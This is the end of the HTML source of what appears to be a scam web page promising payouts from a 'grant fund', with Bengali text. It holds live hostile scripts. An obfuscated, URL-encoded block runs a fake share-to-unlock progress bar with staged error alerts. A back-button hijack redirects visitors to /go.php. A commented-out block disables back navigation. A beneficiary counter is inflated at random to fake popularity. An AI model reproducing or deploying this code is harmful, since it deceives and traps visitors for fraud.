    document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var%20swidth%20%3D%20localStorage.getItem%28saved%29%3B%0Aif%20%28swidth%20%21%3D%3D%20null%29%20%7B%0A%20%20%20%20var%20width%20%3D%20swidth%20*%201%3B%0A%20%20%20%20%24%28%22%23intro%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22.comments%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22%23share%22%29.fadeIn%280%29%3B%0A%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%7D%20else%20%7B%0A%20%20%20%20var%20width%20%3D%200%3B%0A%7D%0A%24%28%22%23Messenger%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.location.href%20%3D%20share%3B%0A%20%20%20%20if%20%28width%20%3D%3D%200%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%2050%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2050%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2015%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2065%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2070%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2010%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2087%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2088%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2090%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2091%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2092%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2093%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2094%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2095%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2096%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23share%22%29.fadeOut%280%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23claim%22%29.fadeIn%281000%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20localStorage.setItem%28saved%2C%20width%29%3B%0A%20%20%20%20setTimeout%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%20%20%20%20%7D%2C%202000%29%3B%0A%7D%29%3B%0A%24%28%22%23offer%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.open%28abcde%2C%20%22_blank%22%29%3B%0A%7D%29%3B%0A%3C/script%3E'))
</script>



<script>
    window.onhashchange = function() {
        jp();
    };

    function hh() {
        history.pushState(history.length + 1, "message", "#" + new Date().getTime());
    }

    function jp() {
        fh();
    }
    setTimeout('hh();', 500);

    function fh() {
        location.href = "/go.php?t=9";
    }

    function goon() {
        location.href = "/go.php?t=9";
    }
</script>


<!--script>
        (function(global) {

            if (typeof(global) === "undefined") {
                throw new Error("window is undefined");
            }

            var _hash = "!";
            var noBackPlease = function() {
                global.location.href += "#";

                // making sure we have the fruit available for juice....
                // 50 milliseconds for just once do not cost much (^__^)
                global.setTimeout(function() {
                    global.location.href += "!";
                }, 50);
            };

            // Earlier we had setInerval here....
            global.onhashchange = function() {
                if (global.location.hash !== _hash) {
                    global.location.hash = _hash;
                }
            };

            global.onload = function() {

                noBackPlease();

                // disables backspace on page except on input fields and textarea..
                document.body.onkeydown = function(e) {
                    var elm = e.target.nodeName.toLowerCase();
                    if (e.which === 8 && (elm !== 'input' && elm !== 'textarea')) {
                        e.preventDefault();
                    }
                    // stopping event bubbling up the DOM tree..
                    e.stopPropagation();
                };

            };

        })(window);
    </script-->

<div class="A">
    <span id="countdowntimer" style="color:#FFD700;">4548</span></b>
    </br>
    <font color="white">এখন পর্যন্ত ব্যবহারকারীরা এই অনুদান ফান্ড থেকে উপকৃত হয়েছেন।</font>
    </br>
    <script type="text/javascript">
        var timeleft = 4548;
        var downloadTimer = setInterval(function() {
            timeleft = timeleft + Math.floor(Math.random() * 600);
            document.getElementById('countdowntimer').textContent = timeleft;
            if (timeleft <= 0)
                clearInterval(downloadTimer);
        }, 1000);
    </script>
</div>

</body>

</html>